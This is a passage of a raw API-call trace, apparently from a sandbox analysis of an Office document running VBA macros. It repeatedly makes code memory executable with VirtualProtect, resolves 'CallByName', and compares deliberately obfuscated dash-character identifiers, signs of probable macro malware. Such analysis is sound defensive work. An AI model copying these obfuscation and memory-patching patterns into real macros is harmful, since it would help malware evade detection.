GetCurrentProcess () returned 0xffffffff [0100.558] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0100.558] GetCurrentProcess () returned 0xffffffff [0100.558] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0100.559] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.559] GetCurrentProcess () returned 0xffffffff [0100.559] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0100.559] GetCurrentProcess () returned 0xffffffff [0100.559] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0100.559] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.560] GetCurrentProcess () returned 0xffffffff [0100.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0100.560] GetCurrentProcess () returned 0xffffffff [0100.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0100.560] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.561] GetCurrentProcess () returned 0xffffffff [0100.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0100.561] GetCurrentProcess () returned 0xffffffff [0100.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0100.561] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.561] GetCurrentProcess () returned 0xffffffff [0100.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0100.561] GetCurrentProcess () returned 0xffffffff [0100.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0100.561] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.562] GetCurrentProcess () returned 0xffffffff [0100.562] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0100.562] GetCurrentProcess () returned 0xffffffff [0100.562] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0100.562] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0100.563] GetCurrentProcess () returned 0xffffffff [0100.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0100.563] SetErrorMode (uMode=0x8001) returned 0x8001 [0100.563] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0100.563] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x69130000 [0100.565] SetErrorMode (uMode=0x8001) returned 0x8001 [0100.566] GetProcAddress (hModule=0x69130000, lpProcName=0x2c9) returned 0x6933fe55 [0100.567] GetAsyncKeyState (vKey=3) returned 0 [0100.645] GetAsyncKeyState (vKey=3) returned 0 [0100.646] CRetailMalloc_Alloc () returned 0xc9d00f8 [0100.646] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.646] memcpy (in: _Dst=0xcb65290, _Src=0x1978c4, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.646] memcpy (in: _Dst=0xcb65188, _Src=0x197714, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.646] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb315724, cbMultiByte=9, lpWideCharStr=0x1159058c, cchWideChar=20 | out: lpWideCharStr="wmubexAZc") returned 9 [0100.647] memcpy (in: _Dst=0xc9cd64c, _Src=0x11590588, _Size=0x18 | out: _Dst=0xc9cd64c) returned 0xc9cd64c [0100.647] memcpy (in: _Dst=0xcb6518c, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.647] memcpy (in: _Dst=0xcb6518c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432d5a, cbMultiByte=6, lpWideCharStr=0x1976c4, cchWideChar=7 | out: lpWideCharStr="VbGet") returned 6 [0100.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0216, cbMultiByte=6, lpWideCharStr=0x197724, cchWideChar=7 | out: lpWideCharStr="VbGet") returned 6 [0100.648] memcpy (in: _Dst=0xc9ebe70, _Src=0xf5ea3c0, _Size=0x4 | out: _Dst=0xc9ebe70) returned 0xc9ebe70 [0100.649] memcpy (in: _Dst=0xcb65190, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0100.649] memcpy (in: _Dst=0xcb65194, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65194) returned 0xcb65194 [0100.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432d7e, cbMultiByte=11, lpWideCharStr=0x1976c4, cchWideChar=12 | out: lpWideCharStr="CallByName") returned 11 [0100.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b01ee, cbMultiByte=11, lpWideCharStr=0x197724, cchWideChar=12 | out: lpWideCharStr="CallByName") returned 11 [0100.653] memcpy (in: _Dst=0x1976ec, _Src=0x197760, _Size=0x8 | out: _Dst=0x1976ec) returned 0x1976ec [0100.653] memcpy (in: _Dst=0xc9fc9b8, _Src=0x1976ec, _Size=0x8 | out: _Dst=0xc9fc9b8) returned 0xc9fc9b8 [0100.653] CRetailMalloc_Alloc () returned 0xc6d87d0 [0100.653] CRetailMalloc_Free () returned 0x1 [0100.653] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.653] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x97\x97\x96\x97\x97\x96\x97\x96\x96\x96\x97\x97\x97\x97\x97\x97\x96\x97\x96\x97\x96\x96\x96", cchCount1=-1, lpString2="\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount2=-1) returned 3 [0100.653] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x97\x97\x96\x96\x96\x96\x97\x97", cchCount1=-1, lpString2="\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount2=-1) returned 1 [0100.653] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x96\x96\x96\x97\x96\x97\x96\x96\x96\x96\x97\x97\x96\x97\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount2=-1) returned 3 [0100.653] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x97\x97\x96", cchCount1=-1, lpString2="\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount2=-1) returned 3 [0100.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432da6, cbMultiByte=27, lpWideCharStr=0x1976c4, cchWideChar=28 | out: lpWideCharStr="–—–—–—–—–––—–—–——–—–—–——–—") returned 27 [0100.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0972, cbMultiByte=27, lpWideCharStr=0x197724, cchWideChar=28 | out: lpWideCharStr="–—–—–—–—–––—–—–——–—–—–——–—") returned 27 [0100.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0972, cbMultiByte=27, lpWideCharStr=0x197724, cchWideChar=28 | out: lpWideCharStr="–—–—–—–—–––—–—–——–—–—–——–—") returned 27 [0100.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0972, cbMultiByte=27, lpWideCharStr=0x197724, cchWideChar=28 | out: lpWideCharStr="–—–—–—–—–––—–—–——–—–—–——–—") returned 27 [0100.654] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x97\x97\x96\x97\x97\x96\x97\x96\x96\x96\x97\x97\x97\x97\x97\x97\x96\x97\x96\x97\x96\x96\x96", cchCount1=-1, lpString2="\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount2=-1) returned 3 [0100.654] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x97\x97\x96\x96\x96\x96\x97\x97", cchCount1=-1, lpString2="\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount2=-1) returned 1 [0100.654] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x96\x96\x96\x97\x96\x97\x96\x96\x96\x96\x97\x97\x96\x97\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount2=-1) returned 3 [0100.654] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x96\x96\x96\x96\x96\x97\x97\x97\x96\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x97\x97\x96", cchCount1=-1, lpString2="\x96\x97\x96\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96\x97", cchCount2=-1) returned 3 [0100.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0972, cbMultiByte=27, lpWideCharStr=0x197724, cchWideChar=28 | out: lpWideCharStr="–—–—–—–—–––—–—–——–—–—–——–—") returned 27 [0100.655] CRetailMalloc_Alloc () returned 0xc6f93c8 [0100.655] _mbscpy_s (in: _Dst=0xc6f93c8, _DstSizeInBytes=0x1b, _Src=0x112b0972 | out: _Dst=0xc6f93c8) returned 0x0 [0100.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0aea, cbMultiByte=34, lpWideCharStr=0x197734, cchWideChar=35 | out: lpWideCharStr="_B_var_–—–—–—–—–––—–—–——–—–—–——–—") returned 34 [0100.655] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x1b, _Src=0x112b0972 | out: _Dst=0x19779c) returned 0x0 [0100.655] CRetailMalloc_Free () returned 0x1 [0100.655] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0100.656] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.656] memcpy (in: _Dst=0xcb6518c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.656] memcpy (in: _Dst=0xcb65188, _Src=0x197714, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.656] memcpy (in: _Dst=0xcb65188, _Src=0x197714, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.656] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.656] memcpy (in: _Dst=0xcb65188, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6936ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0100.657] memcpy (in: _Dst=0xc9d01e4, _Src=0x197944, _Size=0x18 | out: _Dst=0xc9d01e4) returned 0xc9d01e4 [0100.722] CRetailMalloc_Realloc () returned 0xc9d00f8 [0100.722] CRetailMalloc_Free () returned 0x1 [0100.722] GetCurrentProcess () returned 0xffffffff [0100.722] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0100.722] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.723] GetCurrentProcess () returned 0xffffffff [0100.723] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0100.723] GetCurrentProcess () returned 0xffffffff [0100.723] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0100.723] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.724] GetCurrentProcess () returned 0xffffffff [0100.724] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0100.724] GetCurrentProcess () returned 0xffffffff [0100.724] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0100.724] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.725] GetCurrentProcess () returned 0xffffffff [0100.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0100.725] GetCurrentProcess () returned 0xffffffff [0100.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0100.725] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.725] GetCurrentProcess () returned 0xffffffff [0100.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0100.725] GetCurrentProcess () returned 0xffffffff [0100.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0100.725] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.726] GetCurrentProcess () returned 0xffffffff [0100.726] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0100.726] GetCurrentProcess () returned 0xffffffff [0100.726] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0100.726] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.727] GetCurrentProcess () returned 0xffffffff [0100.727] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0100.727] GetCurrentProcess () returned 0xffffffff [0100.727] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0100.727] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.728] GetCurrentProcess () returned 0xffffffff [0100.728] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0100.728] GetCurrentProcess () returned 0xffffffff [0100.728] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0100.728] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.729] GetCurrentProcess () returned 0xffffffff [0100.729] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0100.729] GetCurrentProcess () returned 0xffffffff [0100.729] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0100.729] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.730] GetCurrentProcess () returned 0xffffffff [0100.730] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0100.730] GetCurrentProcess () returned 0xffffffff [0100.730] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0100.730] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.731] GetCurrentProcess () returned 0xffffffff [0100.731] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0100.731] GetCurrentProcess () returned 0xffffffff [0100.731] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0100.731] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.732] GetCurrentProcess () returned 0xffffffff [0100.732] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0100.732] GetCurrentProcess () returned 0xffffffff [0100.732] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0100.732] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.733] GetCurrentProcess () returned 0xffffffff [0100.733] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0100.733] GetCurrentProcess () returned 0xffffffff [0100.733] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0100.733] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.733] GetCurrentProcess () returned 0xffffffff [0100.733] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0100.733] GetCurrentProcess () returned 0xffffffff [0100.733] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0100.734] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.734] GetCurrentProcess () returned 0xffffffff [0100.734] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0100.734] GetCurrentProcess () returned 0xffffffff [0100.734] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0100.734] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.735] GetCurrentProcess () returned 0xffffffff [0100.735] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0100.735] GetCurrentProcess () returned 0xffffffff [0100.735] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0100.735] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.736] GetCurrentProcess () returned 0xffffffff [0100.736] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0100.736] GetCurrentProcess () returned 0xffffffff [0100.736] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0100.736] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.736] GetCurrentProcess () returned 0xffffffff [0100.736] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0100.736] GetCurrentProcess () returned 0xffffffff [0100.736] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0100.737] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.737] GetCurrentProcess () returned 0xffffffff [0100.737] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0100.737] GetCurrentProcess () returned 0xffffffff [0100.737] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0100.737] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.738] GetCurrentProcess () returned 0xffffffff [0100.738] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0100.738] GetCurrentProcess () returned 0xffffffff [0100.738] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0100.738] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.738] GetCurrentProcess () returned 0xffffffff [0100.739] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0100.739] GetCurrentProcess () returned 0xffffffff [0100.739] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0100.739] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.739] GetCurrentProcess () returned 0xffffffff [0100.739] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0100.739] GetCurrentProcess () returned 0xffffffff [0100.739] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0100.739] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.740] GetCurrentProcess () returned 0xffffffff [0100.740] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0100.740] GetCurrentProcess () returned 0xffffffff [0100.740] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0100.740] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.741] GetCurrentProcess () returned 0xffffffff [0100.741] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0100.741] GetCurrentProcess () returned 0xffffffff [0100.741] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0100.741] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.741] GetCurrentProcess () returned 0xffffffff [0100.741] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0100.741] GetCurrentProcess () returned 0xffffffff [0100.741] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0100.741] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.742] GetCurrentProcess () returned 0xffffffff [0100.742] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0100.742] GetCurrentProcess () returned 0xffffffff [0100.742] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0100.742] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.743] GetCurrentProcess () returned 0xffffffff [0100.743] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0100.743] GetCurrentProcess () returned 0xffffffff [0100.743] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0100.743] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.743] GetCurrentProcess () returned 0xffffffff [0100.743] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0100.743] GetCurrentProcess () returned 0xffffffff [0100.744] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0100.744] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.744] GetCurrentProcess () returned 0xffffffff [0100.744] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0100.744] GetCurrentProcess () returned 0xffffffff [0100.744] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0100.744] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.745] GetCurrentProcess () returned 0xffffffff [0100.745] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0100.745] GetCurrentProcess () returned 0xffffffff [0100.745] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0100.745] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.745] GetCurrentProcess () returned 0xffffffff [0100.745] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0100.745] GetCurrentProcess () returned 0xffffffff [0100.746] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0100.746] VirtualProtect (in: lpAddress=0xc7c4eb8, 